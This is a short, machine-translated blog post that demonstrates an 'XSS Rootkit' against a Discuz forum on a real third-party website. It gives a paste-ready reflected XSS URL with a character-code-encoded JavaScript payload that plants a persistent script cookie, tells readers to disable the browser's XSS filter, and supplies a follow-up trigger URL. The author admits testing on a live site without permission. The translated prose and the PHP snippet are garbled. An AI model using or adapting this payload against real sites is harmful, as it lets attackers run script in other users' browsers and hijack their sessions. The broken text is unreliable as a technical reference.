XSS Rootkit: http://www.bkjia.com/Article/201110/107620.html
However, I still don't feel comfortable. I don't need to lose some practical things, so it's easy for others to understand. So I have to take a website for practical testing.
I took a DISCUZ non-persistent XSS test, and IE8 would intercept it. Therefore, we need to disable the XSS filter to succeed. In addition, I used Netease's website for testing. Please forgive me.
1. Access the URL below to install the XSS Rootkit. (Copy and paste URL access. Baidu filters the keywords in the URL)
http://bbs.game.163.com/logging.php?action=logout&referer=javascript:eval (String. fromCharCode (80,101,114,115,105,115,116,101,110, 99,101, 95,100, 97,116, 39,106, 97,118, 97,115, 99,114,105,112,116, 108,101,114,116, 120,115,115, 116,101, 61,110,101,119, 97,116,101, 10,118, 97,114, 32,101,120,112,105,114,101, 121,115, 116,101, 46,115,101,116, 84,105,109,101, 40,100, 97,116,101, 46,103,101,116, 84,105,109,101, 43,101,120,112,105,114,101, 121,115, 10,100,111, 99,117,109,101,110,116, 111,111,107,105,101, 114,101,102,101,114,101,114, 101,114,115,105,115,116,101,110, 99,101, 95,100, 97,116, 101,120,112,105,114,101,115, 43,100, 97,116,101, 46,116,111, 116,114,105,110,103, 97,108,101,114,116, 88,115,115, 111,111,116,107,105,116, 110,115,116, 97,108,108, 99,101,115,115,102,117,108,) & formhash = rootkit
2. Close the browser and re-access the following URL to see the effect in advance.
Http://bbs.game.163.com/logging.php? Action = logout & formhash = testvul
3. because the order of the DISCUZ registration variables is the central sign-in (BMP), the variables that have been registered by GET cannot be affected. When you exit at the same time, a valid formhash is used, here, the referer obtains the initialized variable, and this XSS vulnerability will become invalid. Therefore, our XSS Rootkit is still at a discount, but what about other WEB programs :)
Foreach (array ('_ cookies',' _ Post', '_ get') as $ _ request ){
Foreach ($ _ request as $ _ key => $ _ value ){
$ _ Key {0 }! = '_' & $ _ Key = daddslashes ($ _ value );
}
}
Author: RAyh4c Black Box